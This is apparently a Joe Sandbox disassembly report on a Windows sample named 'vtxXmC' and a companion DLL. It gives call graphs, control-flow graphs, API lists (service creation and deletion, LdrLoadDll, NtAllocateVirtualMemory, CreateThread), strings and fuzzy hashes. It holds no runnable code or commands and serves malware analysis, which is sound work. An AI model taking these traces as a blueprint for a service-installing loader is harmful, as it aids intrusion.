14106->14108 14110 140009d90 MultiByteToWideChar 14106->14110 14107->14095 14108->14095 14109->14095 14110->14106 14111 140009e0e 14110->14111 14112 140008de0 _lock 2 API calls 14111->14112 14113 140009e16 FreeEnvironmentStringsA 14112->14113 14113->14095 14117 140009a03 14114->14117 14115 140008300 _lock 17 API calls 14116 140009bca 14115->14116 14116->14012 14117->14115 14117->14116 14119 1400096a8 14118->14119 14120 1400096b2 14118->14120 14119->14016 14121 140008370 3 API calls 14120->14121 14129 1400096fa 14121->14129 14122 140009709 14122->14016 14123 1400097a5 14124 140008de0 _lock 2 API calls 14123->14124 14125 1400097b4 14124->14125 14125->14016 14126 140008370 3 API calls 14126->14129 14127 1400097e5 14128 140008de0 _lock 2 API calls 14127->14128 14128->14125 14129->14122 14129->14123 14129->14126 14129->14127 14131 140008666 14130->14131 14133 1400086bf 14131->14133 14218 140005380 14131->14218 14133->14020 14135 140001565 14134->14135 14136 140001569 14135->14136 14137 14000157e 14135->14137 14256 140001430 GetModuleFileNameW OpenSCManagerW 14136->14256 14140 140001595 OpenSCManagerW 14137->14140 14141 14000164f 14137->14141 14142 1400015b2 GetLastError 14140->14142 14143 1400015cf OpenServiceW 14140->14143 14144 140001654 14141->14144 14145 140001669 StartServiceCtrlDispatcherW 14141->14145 14142->13987 14147 140001611 DeleteService 14143->14147 14148 1400015e9 GetLastError CloseServiceHandle 14143->14148 14265 1400011f0 14144->14265 14145->13987 14150 140001626 CloseServiceHandle CloseServiceHandle 14147->14150 14151 14000161e GetLastError 14147->14151 14148->13987 14150->13987 14151->14150 14153 14000f01e __SehTransFilter 14152->14153 14154 14000f03b LoadLibraryA 14153->14154 14155 14000f125 _lock 14153->14155 14156 14000f054 GetProcAddress 14154->14156 14157 1400094c9 14154->14157 14159 14000f165 14155->14159 14175 1400073e0 LdrLoadDll 14155->14175 14156->14157 14158 14000f06d _lock 14156->14158 14157->13983 14163 14000f075 GetProcAddress 14158->14163 14162 1400073e0 _lock LdrLoadDll 14159->14162 14173 14000f1a3 _lock 14159->14173 14161 1400073e0 _lock LdrLoadDll 14161->14157 14168 14000f1e9 14162->14168 14165 140007220 _lock 14163->14165 14167 14000f094 GetProcAddress 14165->14167 14166 1400073e0 _lock LdrLoadDll 14166->14159 14170 14000f0b3 _lock 14167->14170 14169 1400073e0 _lock LdrLoadDll 14168->14169 14168->14173 14169->14173 14170->14155 14171 14000f0e9 GetProcAddress 14170->14171 14172 14000f101 _lock 14171->14172 14172->14155 14174 14000f10d GetProcAddress 14172->14174 14173->14161 14174->14155 14176 140007333 14175->14176 14176->14175 14177 140007403 14176->14177 14177->14166 14179 1400083a0 14178->14179 14181 1400083e0 14179->14181 14182 1400083be Sleep 14179->14182 14189 14000e850 14179->14189 14181->14057 14182->14179 14182->14181 14184 1400073e0 _lock LdrLoadDll 14183->14184 14185 14000edec _lock 14184->14185 14186 14000ee1d _lock 14185->14186 14187 14000ee26 GetModuleHandleA 14185->14187 14186->14058 14187->14186 14188 14000ee38 GetProcAddress 14187->14188 14188->14186 14190 14000e865 14189->14190 14191 14000e8be HeapAlloc 14190->14191 14193 14000e876 sprintf_s 14190->14193 14194 1400090b0 14190->14194 14191->14190 14191->14193 14193->14179 14195 1400073e0 _lock LdrLoadDll 14194->14195 14196 1400090c5 14195->14196 14196->14190 14198 140008de9 HeapFree 14197->14198 14201 140008e19 _lock 14197->14201 14199 140008dff sprintf_s 14198->14199 14198->14201 14200 140008e09 GetLastError 14199->14200 14200->14201 14201->14083 14203 140008320 14202->14203 14205 140008358 14203->14205 14206 140008338 Sleep 14203->14206 14207 1400090f0 14203->14207 14205->14104 14205->14105 14206->14203 14206->14205 14208 14000919e 14207->14208 14213 140009103 14207->14213 14209 1400090b0 _lock LdrLoadDll 14208->14209 14210 1400091a3 sprintf_s 14209->14210 14210->14203 14211 14000914c HeapAlloc 14211->14213 14216 140009173 sprintf_s 14211->14216 14212 140009540 _lock 12 API calls 14212->14213 14213->14211 14213->14212 14214 1400090b0 _lock LdrLoadDll 14213->14214 14215 140009300 _lock 10 API calls 14213->14215 14213->14216 14217 140008510 _lock 3 API calls 14213->14217 14214->14213 14215->14213 14216->14203 14217->14213 14221 140005250 14218->14221 14220 140005389 14220->14133 14222 140005271 14221->14222 14223 1400073e0 _lock LdrLoadDll 14222->14223 14224 14000527e 14223->14224 14225 1400073e0 _lock LdrLoadDll 14224->14225 14226 14000528d 14225->14226 14232 1400052f0 _lock 14226->14232 14233 140008490 14226->14233 14228 1400052b5 14229 1400052d9 14228->14229 14228->14232 14236 140008400 14228->14236 14231 140008400 7 API calls 14229->14231 14229->14232 14231->14232 14232->14220 14234 1400084c5 HeapSize 14233->14234 14235 140008499 sprintf_s 14233->14235 14235->14228 14238 140008430 14236->14238 14239 140008472 14238->14239 14240 140008450 Sleep 14238->14240 14241 14000e920 14238->14241 14239->14229 14240->14238 14240->14239 14242 14000e935 14241->14242 14243 14000e94c 14242->14243 14254 14000e95e 14242->14254 14245 140008de0 _lock 2 API calls 14243->14245 14244 14000e9b1 14247 1400090b0 _lock LdrLoadDll 14244->14247 14248 14000e951 14245->14248 14246 14000e973 HeapReAlloc 14250 14000e9b9 _lock sprintf_s 14246->14250 14246->14254 14247->14250 14248->14238 14249 14000e9f4 sprintf_s 14252 14000e9f9 GetLastError 14249->14252 14250->14238 14251 1400090b0 _lock LdrLoadDll 14251->14254 14252->14250 14253 14000e9db sprintf_s 14255 14000e9e0 GetLastError 14253->14255 14254->14244 14254->14246 14254->14249 14254->14251 14254->14253 14255->14250 14257 140001482 CreateServiceW 14256->14257 14258 14000147a GetLastError 14256->14258 14260 1400014ea GetLastError 14257->14260 14261 1400014df CloseServiceHandle 14257->14261 14259 1400014fd 14258->14259 14271 140004f30 14259->14271 14263 1400014f2 CloseServiceHandle 14260->14263 14261->14263 14263->14259 14264 14000150d 14264->13987 14266 1400011fa 14265->14266 14280 1400051d0 14266->14280 14269 140004f30 sprintf_s NtAllocateVirtualMemory 14270 140001262 14269->14270 14270->13987 14272 140004f39 _SetThrowImageBase 14271->14272 14273 140004f44 14272->14273 14276 140006c95 14272->14276 14273->14264 14275 14000660e sprintf_s 14275->14264 14277 140006d9d 14276->14277 14278 140006d7b 14276->14278 14277->14275 14278->14277 14279 140006f95 NtAllocateVirtualMemory 14278->14279 14279->14277 14283 140008270 14280->14283 14282 140001238 MessageBoxW 14282->14269 14284 14000827e 14283->14284 14286 1400082ac sprintf_s 14283->14286 14284->14286 14287 140008120 14284->14287 14286->14282 14288 14000816a 14287->14288 14292 14000813b sprintf_s 14287->14292 14290 1400081d7 14288->14290 14288->14292 14293 140007f50 14288->14293 14291 140007f50 sprintf_s 54 API calls 14290->14291 14290->14292 14291->14292 14292->14286 14301 140007f69 sprintf_s 14293->14301 14294 140007f74 sprintf_s 14294->14290 14295 14000801d 14296 1400080d5 14295->14296 14297 14000802f 14295->14297 14298 14000cc00 sprintf_s 54 API calls 14296->14298 14299 14000804c 14297->14299 14302 140008081 14297->14302 14304 140008056 14298->14304 14309 14000cc00 14299->14309 14301->14294 14301->14295 14306 14000cd50 14301->14306 14302->14304 14317 14000c2a0 14302->14317 14304->14290 14307 140008300 _lock 17 API calls 14306->14307 14308 14000cd6a 14307->14308 14308->14295 14310 14000cc3f 14309->14310 14316 14000cc23 sprintf_s 14309->14316 14310->14316 14325 14000fc50 14310->14325 14314 14000ccc5 sprintf_s 14370 14000fd20 LeaveCriticalSection 14314->14370 14316->14304 14318 14000c2e0 14317->14318 14321 14000c2c3 sprintf_s 14317->14321 14319 14000fc50 sprintf_s 25 API calls 14318->14319 14318->14321 14320 14000c34e 14319->14320 14322 14000c1f0 sprintf_s 2 API calls 14320->14322 14323 14000c367 sprintf_s 14320->14323 14321->14304 14322->14323 14404 14000fd20 LeaveCriticalSection 14323->14404 14326 14000fc96 14325->14326 14327 14000fccb 14325->14327 14371 14000b400 14326->14371 14329 14000ccac 14327->14329 14330 14000fccf EnterCriticalSection 14327->14330 14329->14314 14335 14000c3f0 14329->14335 14330->14329 14338 14000c42e 14335->14338 14354 14000c427 sprintf_s 14335->14354 14336 140004f30 sprintf_s NtAllocateVirtualMemory 14337 14000cbe6 14336->14337 14337->14314 14341 14000c4fb _SetThrowImageBase sprintf_s 14338->14341 14338->14354 14398 14000c1f0 14338->14398 14340 14000c841 14342 14000c86a 14340->14342 14343 14000cb20 WriteFile 14340->14343 14341->14340 14345 14000c526 GetConsoleMode 14341->14345 14344 14000c936 14342->14344 14350 14000c876 14342->14350 14346 14000cb53 GetLastError 14343->14346 14343->14354 14351 14000c940 14344->14351 14360 14000ca02 14344->14360 14345->14340 14347 14000c557 14345->14347 14346->14354 14347->14340 14348 14000c564 GetConsoleCP 14347->14348 14348->14354 14366 14000c581 sprintf_s 14348->14366 14349 14000c8c5 WriteFile 14349->14350 14352 14000c928 GetLastError 14349->14352 14350->14349 14350->14354 14351->14354 14355 14000c991 WriteFile 14351->14355 14352->14354 14353 14000ca57 WideCharToMultiByte 14356 14000cb15 GetLastError 14353->14356 14353->14360 14354->14336 14355->14351 14357 14000c9f4 GetLastError 14355->14357 14356->14354 14357->14354 14358 14000cab0 WriteFile 14359 14000caf6 GetLastError 14358->14359 14358->14360 14359->14354 14359->14360 14360->14353 14360->14354 14360->14358 14361 14000fd50 7 API calls sprintf_s 14361->14366 14362 14000c649 WideCharToMultiByte 14362->14354 14363 14000c68c WriteFile 14362->14363 14364 14000c80d GetLastError 14363->14364 14363->14366 14364->14354 14365 14000c829 GetLastError 14365->14354 14366->14354 14366->14361 14366->14362 14366->14365 14367 14000c6e2 WriteFile 14366->14367 14369 14000c81b GetLastError 14366->14369 14367->14366 14368 14000c7ff GetLastError 14367->14368 14368->14354 14369->14354 14372 14000b41e 14371->14372 14373 14000b42f EnterCriticalSection 14371->14373 14377 14000b2f0 14372->14377 14375 14000b423 14375->14373 14376 1400084e0 _lock 12 API calls 14375->14376 14376->14373 14378 14000b317 14377->14378 14379 14000b32e 14377->14379 14380 140009540 _lock 12 API calls 14378->14380 14382 140008300 _lock 17 API calls 14379->14382 14385 14000b342 sprintf_s 14379->14385 14381 14000b31c 14380->14381 14384 140009300 _lock 10 API calls 14381->14384 14383 14000b350 14382->14383 14383->14385 14387 14000b400 _lock 22 API calls 14383->14387 14386 14000b324 14384->14386 14385->14375 14388 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14386->14388 14389 14000b371 14387->14389 14388->14379 14390 14000b3a7 14389->14390 14391 14000b379 14389->14391 14392 140008de0 _lock HeapFree GetLastError 14390->14392 14393 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14391->14393 14397 14000b392 sprintf_s 14392->14397 14394 14000b386 14393->14394 14396 140008de0 _lock HeapFree GetLastError 14394->14396 14394->14397 14395 14000b3b0 LeaveCriticalSection 14395->14385 14396->14397 14397->14395 14399 14000c20c sprintf_s 14398->14399 14400 14000c212 sprintf_s 14399->14400 14401 14000c22c SetFilePointer 14399->14401 14400->14341 14402 14000c254 sprintf_s 14401->14402 14403 14000c24a GetLastError 14401->14403 14402->14341 14403->14402 16268 7ffb23b011b0 16273 7ffb23b01209 16268->16273 16269 7ffb23b01b70 _log10_special 8 API calls 16272 7ffb23b014d3 16269->16272 16270 7ffb23b01b90 51 API calls 16286 7ffb23b01300 _invalid_parameter_noinfo_noreturn 16270->16286 16271 7ffb23b014f0 16301 7ffb23b01a40 16271->16301 16273->16271 16275 7ffb23b012c7 16273->16275 16276 7ffb23b0129e 16273->16276 16280 7ffb23b012b9 BuildCatchObjectHelperInternal 16273->16280 16273->16286 16277 7ffb23b01b90 51 API calls 16275->16277 16278 7ffb23b014f6 16276->16278 16287 7ffb23b01b90 16276->16287 16277->16280 16304 7ffb23b01110 16278->16304 16280->16270 16284 7ffb23b014eb 16296 7ffb23b079cc 16284->16296 16286->16269 16289 7ffb23b01b9b 16287->16289 16288 7ffb23b012b0 16288->16280 16288->16284 16289->16288 16290 7ffb23b07a4c __std_exception_copy 2 API calls 16289->16290 16291 7ffb23b01bba 16289->16291 16290->16289 16294 7ffb23b01bc5 16291->16294 16310 7ffb23b021f0 16291->16310 16293 7ffb23b01110 Concurrency::cancel_current_task 51 API calls 16295 7ffb23b01bcb 16293->16295 16294->16293 16297 7ffb23b07844 _invalid_parameter_noinfo_noreturn 47 API calls 16296->16297 16298 7ffb23b079e5 16297->16298 16299 7ffb23b079fc _invalid_parameter_noinfo_noreturn 17 API calls 16298->16299 16300 7ffb23b079fa 16299->16300 16314 7ffb23b01b34 16301->16314 16305 7ffb23b0111e Concurrency::cancel_current_task 16304->16305 16306 7ffb23b03990 Concurrency::cancel_current_task 2 API calls 16305->16306 16307 7ffb23b0112f 16306->16307 16308 7ffb23b0379c __std_exception_copy 49 API calls 16307->16308 16309 7ffb23b01159 16308->16309 16311 7ffb23b021fe Concurrency::cancel_current_task 16310->16311 16312 7ffb23b03990 Concurrency::cancel_current_task 2 API calls 16311->16312 16313 7ffb23b0220f 16312->16313 16319 7ffb23b01ab0 16314->16319 16317 7ffb23b03990 Concurrency::cancel_current_task 2 API calls 16318 7ffb23b01b56 16317->16318 16320 7ffb23b0379c __std_exception_copy 49 API calls 16319->16320 16321 7ffb23b01ae4 16320->16321 16321->16317 13970 140006c95 13971 140006d9d 13970->13971 13972 140006d7b 13970->13972 13972->13971 13973 140006f95 NtAllocateVirtualMemory 13972->13973 13973->13971 14405 1400054e0 14406 14000552c 14405->14406 14409 140005506 sprintf_s 14405->14409 14418 1400074d0 14406->14418 14410 140008370 3 API calls 14414 140005545 _SetThrowImageBase 14410->14414 14411 1400055b8 14412 140008de0 _lock 2 API calls 14411->14412 14413 1400055c0 sprintf_s 14412->14413 14413->14409 14414->14411 14422 1400074f0 14414->14422 14417 1400055b0 GetLastError 14417->14411 14419 140007333 14418->14419 14420 140005536 14419->14420 14421 1400073e0 LdrLoadDll 14419->14421 14420->14410 14421->14419 14424 140007333 14422->14424 14423 140005561 CreateThread 14423->14413 14423->14417 14424->14423 14425 1400073e0 LdrLoadDll 14424->14425 14425->14424

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 157 140006f95-140006fd6 NtAllocateVirtualMemory 153->157 158 140006f90 153->158 155 140006f25-140006f2d 154->155 156 140006f2f-140006f33 154->156 160 140006f37-140006f7a 155->160 156->160 157->132 159 140006fdc-140007020 157->159 158->132 161 14000702c-140007037 159->161 162 140006f84 160->162 163 140006f7c-140006f80 160->163 164 140007039-140007058 161->164 165 14000705a-140007062 161->165 162->151 163->162 164->161 168 14000706e-14000707b 165->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@
                          • API String ID: 0-149943524
                          • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                          • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                          • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                          • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 270 1400074b4 265->270 271 140007480-1400074b3 265->271 267 1400074eb-14000752b 266->267 268 14000752c-140007535 266->268 267->268 272 140007552 268->272 273 140007537-140007554 268->273 270->268 271->270 272->260 273->264 274->256 275->260
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                          • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                          • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                          • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: File$CreateReadmalloc
                          • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                          • API String ID: 3950102678-3381721293
                          • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                          • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                          • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                          • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 25 7ffb23b01c00-7ffb23b01c06 26 7ffb23b01c08-7ffb23b01c0b 25->26 27 7ffb23b01c41-7ffb23b01c4b 25->27 29 7ffb23b01c35-7ffb23b01c74 call 7ffb23b02470 26->29 30 7ffb23b01c0d-7ffb23b01c10 26->30 28 7ffb23b01d68-7ffb23b01d7d 27->28 34 7ffb23b01d7f 28->34 35 7ffb23b01d8c-7ffb23b01da6 call 7ffb23b02304 28->35 47 7ffb23b01c7a-7ffb23b01c8f call 7ffb23b02304 29->47 48 7ffb23b01d42 29->48 32 7ffb23b01c28 __scrt_dllmain_crt_thread_attach 30->32 33 7ffb23b01c12-7ffb23b01c15 30->33 36 7ffb23b01c2d-7ffb23b01c34 32->36 38 7ffb23b01c17-7ffb23b01c20 33->38 39 7ffb23b01c21-7ffb23b01c26 call 7ffb23b023b4 33->39 40 7ffb23b01d81-7ffb23b01d8b 34->40 45 7ffb23b01da8-7ffb23b01dd9 call 7ffb23b0242c call 7ffb23b022d4 call 7ffb23b027b4 call 7ffb23b025d0 call 7ffb23b025f4 call 7ffb23b0245c 35->45 46 7ffb23b01ddb-7ffb23b01e0c call 7ffb23b02630 35->46 39->36 45->40 57 7ffb23b01e0e-7ffb23b01e14 46->57 58 7ffb23b01e1d-7ffb23b01e23 46->58 60 7ffb23b01d5a-7ffb23b01d67 call 7ffb23b02630 47->60 61 7ffb23b01c95-7ffb23b01ca6 call 7ffb23b02374 47->61 51 7ffb23b01d44-7ffb23b01d59 48->51 57->58 62 7ffb23b01e16-7ffb23b01e18 57->62 63 7ffb23b01e65-7ffb23b01e6d call 7ffb23b01720 58->63 64 7ffb23b01e25-7ffb23b01e2f 58->64 60->28 77 7ffb23b01ca8-7ffb23b01ccc call 7ffb23b02778 call 7ffb23b022c4 call 7ffb23b022e8 call 7ffb23b07b10 61->77 78 7ffb23b01cf7-7ffb23b01d01 call 7ffb23b025d0 61->78 68 7ffb23b01f02-7ffb23b01f0f 62->68 79 7ffb23b01e72-7ffb23b01e7b 63->79 69 7ffb23b01e36-7ffb23b01e3c 64->69 70 7ffb23b01e31-7ffb23b01e34 64->70 75 7ffb23b01e3e-7ffb23b01e44 69->75 70->75 84 7ffb23b01e4a-7ffb23b01e5f call 7ffb23b01c00 75->84 85 7ffb23b01ef8-7ffb23b01f00 75->85 77->78 127 7ffb23b01cce-7ffb23b01cd5 __scrt_dllmain_after_initialize_c 77->127 78->48 101 7ffb23b01d03-7ffb23b01d0f call 7ffb23b02620 78->101 80 7ffb23b01eb3-7ffb23b01eb5 79->80 81 7ffb23b01e7d-7ffb23b01e7f 79->81 90 7ffb23b01eb7-7ffb23b01eba 80->90 91 7ffb23b01ebc-7ffb23b01ed1 call 7ffb23b01c00 80->91 81->80 88 7ffb23b01e81-7ffb23b01ea3 call 7ffb23b01720 call 7ffb23b01d68 81->88 84->63 84->85 85->68 88->80 121 7ffb23b01ea5-7ffb23b01eaa 88->121 90->85 90->91 91->85 110 7ffb23b01ed3-7ffb23b01edd 91->110 112 7ffb23b01d35-7ffb23b01d40 101->112 113 7ffb23b01d11-7ffb23b01d1b call 7ffb23b02538 101->113 117 7ffb23b01ee4-7ffb23b01ef2 110->117 118 7ffb23b01edf-7ffb23b01ee2 110->118 112->51 113->112 126 7ffb23b01d1d-7ffb23b01d2b 113->126 122 7ffb23b01ef4 117->122 118->122 121->80 122->85 126->112 127->78 128 7ffb23b01cd7-7ffb23b01cf4 call 7ffb23b07acc 127->128 128->78
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                          • Instruction ID: 59fc45f7738aa4575cac95f1b0459cd7b98154e2ec733857b602e3feec6def0d
                          • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                          • Instruction Fuzzy Hash: 0381AEACE182C746F61A9F75DC8937D6290AF45780F0C81B5EACD6B792DE2CE54A8700

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                          • String ID: WordpadFilter.db
                          • API String ID: 868324331-3647581008
                          • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                          • Instruction ID: 944849546ce85cf1f9131d301e0734831be6a2f6486a844c638dfe3984c561d3
                          • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                          • Instruction Fuzzy Hash: 94316B7AB15B8189E701DFB1D8543AD73A5EB88788F188675EE8D27B44EF38D152C340

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 196 7ffb23b011b0-7ffb23b01207 197 7ffb23b01209-7ffb23b01222 call 7ffb23b11490 196->197 198 7ffb23b0124b-7ffb23b0124e 196->198 207 7ffb23b01224-7ffb23b01227 197->207 208 7ffb23b0123e 197->208 200 7ffb23b014b8-7ffb23b014bf 198->200 201 7ffb23b01254-7ffb23b01280 198->201 202 7ffb23b014c3-7ffb23b014ea call 7ffb23b01b70 200->202 204 7ffb23b012f6-7ffb23b01335 call 7ffb23b01b90 call 7ffb23b10a50 201->204 205 7ffb23b01282-7ffb23b0128f 201->205 233 7ffb23b01340-7ffb23b013cb 204->233 210 7ffb23b01295-7ffb23b0129c 205->210 211 7ffb23b014f1-7ffb23b014f6 call 7ffb23b01a40 205->211 213 7ffb23b01229-7ffb23b0123c call 7ffb23b11490 207->213 214 7ffb23b01241-7ffb23b01246 207->214 208->214 217 7ffb23b012c7-7ffb23b012cf call 7ffb23b01b90 210->217 218 7ffb23b0129e-7ffb23b012a5 210->218 223 7ffb23b014f7-7ffb23b014ff call 7ffb23b01110 211->223 213->207 213->208 214->198 231 7ffb23b012d2-7ffb23b012f1 call 7ffb23b10e10 217->231 218->223 224 7ffb23b012ab-7ffb23b012b3 call 7ffb23b01b90 218->224 234 7ffb23b012b9-7ffb23b012c5 224->234 235 7ffb23b014eb-7ffb23b014f0 call 7ffb23b079cc 224->235 231->204 233->233 237 7ffb23b013d1-7ffb23b013da 233->237 234->231 235->211 238 7ffb23b013e0-7ffb23b01402 237->238 241 7ffb23b01404-7ffb23b0140e 238->241 242 7ffb23b01411-7ffb23b0142c 238->242 241->242 242->238 244 7ffb23b0142e-7ffb23b01436 242->244 245 7ffb23b01498-7ffb23b014a6 244->245 246 7ffb23b01438-7ffb23b0143b 244->246 248 7ffb23b014a8-7ffb23b014b5 call 7ffb23b01bcc 245->248 249 7ffb23b014b6 245->249 247 7ffb23b01440-7ffb23b01449 246->247 250 7ffb23b01455-7ffb23b01465 247->250 251 7ffb23b0144b-7ffb23b01453 247->251 248->249 249->202 253 7ffb23b01467-7ffb23b0146e 250->253 254 7ffb23b01470-7ffb23b01496 250->254 251->250 253->254 254->245 254->247
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                          • String ID:
